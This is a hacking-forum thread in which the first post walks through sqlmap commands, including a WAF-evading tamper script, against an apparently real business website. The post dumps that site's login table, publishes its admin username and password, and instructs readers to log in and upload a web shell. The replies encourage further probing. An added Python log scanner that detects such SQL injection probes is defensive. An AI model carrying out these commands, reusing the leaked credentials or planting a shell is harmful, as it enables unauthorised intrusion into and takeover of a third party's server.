did you tired from watching ? come to hack with me (photo)
did you tired from watching ? come to hack with me (photo) #1
Hello everybody

I will explain how to use sqlmap on Windows

download
Click Here

Extract it in the C:\ folder
Rename it to sqlmap

Now we will search for a site that has an exploit (SQL)
This site is for learning
( http://www.retaillogistics.net/show_temp...gory=About )
After the URL, put ( ' )
http://www.retaillogistics.net/show_temp...gory=About'
If any change happens in the page (a hidden photo, a mistake shown, etc.), that means it has an exploit.
On the site, after you put ', it will look like this:
[Image: 1.jpg]
Now we will hack

Press (Windows + R) or open cmd
Follow the instructions:
1- cd ..
2- cd sqlmap < this is the name of the folder I said before to rename to sqlmap
3- sqlmap.py -u "http://www.retaillogistics.net/show_template.php?topic_ID=4&category=About" --dbms=mysql --tamper modsecurityzeroversioned.py --dbs --random-agent
Be careful: the URL is without ( ' )

Now you will see the databases of the site
[Image: 2.jpg]

Now change --dbs to -D and the name of the database, and after that --tables to show the tables of the database, like this:
sqlmap.py -u "http://www.retaillogistics.net/show_template.php?topic_ID=4&category=About" --dbms=mysql --tamper modsecurityzeroversioned.py -D 97381_retaillogistic --tables --random-agent

[Image: 3.jpg]

We just need the login table (the name of the table that contains the user and password: login, admin, member, panel, control, etc.)

Now change --tables to -T and the name of the table, like this:
sqlmap.py -u "http://www.retaillogistics.net/show_template.php?topic_ID=4&category=About" --dbms=mysql --tamper modsecurityzeroversioned.py -D 97381_retaillogistic -T login --dump --random-agent

[Image: 4.jpg]

Go to the login page

Click here to enjoy

Username is admin
Password is retail@2012

Go to Manage Schedule Files
Upload your shell

Thanks
I'm sorry, I know little English
Mr.Mr8n
Reply
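
For defenders, the probing described in the post above leaves recognisable traces in web server access logs. The following is an added example, not part of the original thread: a Python scan over constructed log lines (hypothetical paths, documentation IP addresses) that flags a query parameter ending in a single quote and MySQL versioned comments (`/*!00000`), assumed here to be the marker left by the tamper script named in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined format); paths and IPs are hypothetical.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2016:10:00:01 +0000] "GET /show.php?id=4&category=About HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2016:10:00:09 +0000] "GET /show.php?id=4&category=About%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2016:10:02:41 +0000] "GET /show.php?id=4%20/*!00000AND%202%3E1*/&category=About HTTP/1.1" 200 5120 "-" "Opera/9.80"
192.0.2.50 - - [10/Mar/2016:10:05:12 +0000] "GET /search.php?q=O%27Brien+logistics HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rules run on the URL-decoded parameter value, so %27 and ' are treated alike.
RULES = {
    # A value that ends in a quote is the classic manual probe; a quote in the
    # middle of a value (O'Brien) is common in legitimate input and is ignored.
    "trailing_quote": re.compile(r"'$"),
    # MySQL versioned comment, e.g. /*!00000AND 2>1*/ (assumed tamper marker).
    "versioned_comment": re.compile(r"/\*!\d{5}"),
}

def scan(log_text):
    """Return (client_ip, parameter, rule) for every suspicious query value."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand
        client_ip, target = match.groups()
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            for rule, pattern in RULES.items():
                if pattern.search(value):
                    findings.append((client_ip, name, rule))
    return findings

if __name__ == "__main__":
    for client_ip, name, rule in scan(SAMPLE_LOG):
        print(f"{client_ip}: parameter '{name}' matched {rule}")
```

The user agent is deliberately not used as a signal, because the commands in the post randomise it.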

RE: did you tired from watching ? come to hack with me (photo) #2
I hope that is not a legit website.

Reply

RE: did you tired from watching ? come to hack with me (photo) #3
Upon testing the site briefly via manual input, it seems to sanitize user input with escaped data for predefined characters.

I'll check it out further later tonight/early tomorrow against other attack vectors.
[Image: AD83g1A.png]

Reply